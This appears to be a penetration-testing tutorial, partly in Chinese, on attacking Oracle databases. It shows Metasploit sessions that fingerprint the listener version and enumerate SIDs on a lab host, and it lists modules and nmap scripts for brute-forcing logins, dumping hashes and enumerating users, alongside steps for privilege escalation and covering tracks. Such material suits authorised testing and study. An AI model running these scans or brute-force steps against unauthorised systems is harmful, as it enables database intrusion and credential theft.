Oracle Attack Methodology

Oracle Attack Methodology

1. Locate Oracle Version

2. Determine Oracle Version

3. Determine Oracle SID

4. Guess/Bruteforce USER/PASS

5. Privilege Escalation via SQL Injection

6. Manipulate Data/Post Exploitation

7. Cover Tracks

++++++++++++++++++++++++++++++++++Determine Oracle Version

msf > use auxiliary/scanner/oracle/

use auxiliary/scanner/oracle/emc_sid            use auxiliary/scanner/oracle/sid_enum

use auxiliary/scanner/oracle/isqlplus_login     use auxiliary/scanner/oracle/spy_sid

use auxiliary/scanner/oracle/isqlplus_sidbrute  use auxiliary/scanner/oracle/tnslsnr_version

use auxiliary/scanner/oracle/oracle_hashdump    use auxiliary/scanner/oracle/xdb_sid

use auxiliary/scanner/oracle/oracle_login       use auxiliary/scanner/oracle/xdb_sid_brute

use auxiliary/scanner/oracle/sid_brute          

msf > use auxiliary/scanner/oracle/tnslsnr_version

msf auxiliary(tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS                    yes       The target address range or CIDR identifier

   RPORT    1521             yes       The target port

   THREADS  1                yes       The number of concurrent threads

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.100

RHOSTS => 192.168.1.100

msf auxiliary(tnslsnr_version) > run

[+] 192.168.1.100:1521 Oracle - Version: 32-bit Windows: Version 9.2.0.1.0 - Production

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

++++++++++++++++++++++++++++++++++Determine Oracle SID

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/oracle/sid_enum

msf auxiliary(sid_enum) > set RHOSTS 192.168.1.100

RHOSTS => 192.168.1.100

msf auxiliary(sid_enum) > set THREADS 8

THREADS => 8

msf auxiliary(sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS   192.168.1.100    yes       The target address range or CIDR identifier

   RPORT    1521             yes       The target port

   THREADS  8                yes       The number of concurrent threads

msf auxiliary(sid_enum) > run

[+] Identified SID for 192.168.1.100:1521 ["PLSExtProc"]

[+] Identified SID for 192.168.1.100:1521 ["dbnis"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["PLSExtProc"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnis"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnisXDB"]

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

................

SID 擷取後，下一步就是嘗試猜解Oracle User/Password， 如果成功擷取使用者名，可嘗試登陸并提權。 關于上述内容的具體描述請查閱下面的pdf.

metasploit在做密碼猜解時，調用了nmap的腳本，namp中關于oracle的可用腳本如下所示:

[email protected]:~# ls -l /usr/share/nmap/scripts/*oracle*

-rw-r--r-- 1 root root 7159 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute.nse

-rw-r--r-- 1 root root 6465 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute-stealth.nse

-rw-r--r-- 1 root root 4615 Dec  6  2013 /usr/share/nmap/scripts/oracle-enum-users.nse

-rw-r--r-- 1 root root 4892 Dec  6  2013 /usr/share/nmap/scripts/oracle-sid-brute.nse

nmap --script oracle-enum-users --script-args oracle-enum-users.sid=dbnis,userdb=oracle_default_users.txt -p 1521 192.168.1.100 

參考連結:

http://pentestlab.wordpress.com/category/information-gathering/

http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf